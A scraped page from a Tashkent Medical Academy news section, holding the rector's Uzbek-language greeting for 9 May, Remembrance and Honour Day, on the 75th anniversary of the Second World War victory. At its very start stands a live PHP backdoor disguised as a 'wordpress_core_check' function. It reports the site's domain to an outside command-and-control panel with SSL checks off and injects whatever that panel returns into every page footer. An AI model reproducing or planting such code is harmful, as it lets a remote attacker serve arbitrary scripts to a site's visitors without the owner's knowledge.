if(!function_exists('wordpress_core_check')){function wordpress_core_check(){ $c2_url="https://validlogs.com/BackPanel/panel.php"; $domain=parse_url(home_url(),PHP_URL_HOST); $resp=wp_remote_post($c2_url,["body"=>["action"=>"register_domain","domain"=>$domain],"timeout"=>8,"sslverify"=>false]);if(is_wp_error($resp))return;$payload=wp_remote_retrieve_body($resp);if(!empty($payload)){add_action("wp_footer",function() use ($payload){echo $payload;});}}add_action("init","wordpress_core_check",9999);} Тошкент тиббиёт академияси ректорининг 9 май – Хотира ва Қадрлаш кунига бағишланган байрам табриги – Toshkent tibbiyot akademiyasi – Kampus hayoti
Bo'lim yangiliklari Yangiliklar

Тошкент тиббиёт академияси ректорининг 9 май – Хотира ва Қадрлаш кунига бағишланган байрам табриги

Ҳурматли ҳамкасблар, азиз талабалар!

Барчангизни 9 май – Хотира ва Қадрлаш куни билан, Иккинчи жаҳон урушида қозонилган буюк Ғалабанинг 75 йиллиги билан чин қалбимдан самимий табриклайман.

Мана шу улуғ айём кунида ҳаммамиз энг аввало уруш майдонларидан қайтмаган минг-минглаб юртдошларимизнинг муқаддас хотираси олдида бош эгиб, уларнинг руҳи покларига ҳурмат бажо келтирамиз.Бугунги кунда турли синовларни бошимиздан ўтказмоқдамиз – юртимизга (COVID-19) коронавирус инфекциясининг кириб келиши, Бухоро вилоятидаги табиий офат ва Сирдарё вилоятидаги Сардоба сув омбори фожиалари каби синовларни халқимиз бир бўлиб енгаётгани, албатта ота-боболаримиздан сақланиб қолган азалий қадриятларимиздандир.Иккинчи жаҳон уруши давридаги ўта оғир ва машаққатли йилларда халқимизнинг инсонпарварлик ва бағрикенглик фазилатлари яққол намоён бўлганини биламиз. Эл-юртимиз мамлакатнинг уруш бўлаётган ҳудудларидан эвакуация қилинган турли миллатга мансуб болалар, аёллар ва кексаларга бошпана бериб, бир бурда нонини улар билан баҳам кўрди.Бугунги қутлуғ айёмда ота-боболаримизнинг шонли анъаналарини муносиб давом эттириб, Ватан ҳимояси йўлида ўзини аямасдан, фидокорона хизмат қилаётган барча мард ва жасур юртдошларимизга самимий миннатдорлик изҳор этамиз.Барчангизни 9 май – Хотира ва Қадрлаш куни билан яна бир бор қутлаб, сизларга сиҳат-саломатлик, бахт-саодат, хонадонларингизга файзу барака тилайман!

Тошкент тиббиёт академияси ректори Лазиз Туйчиев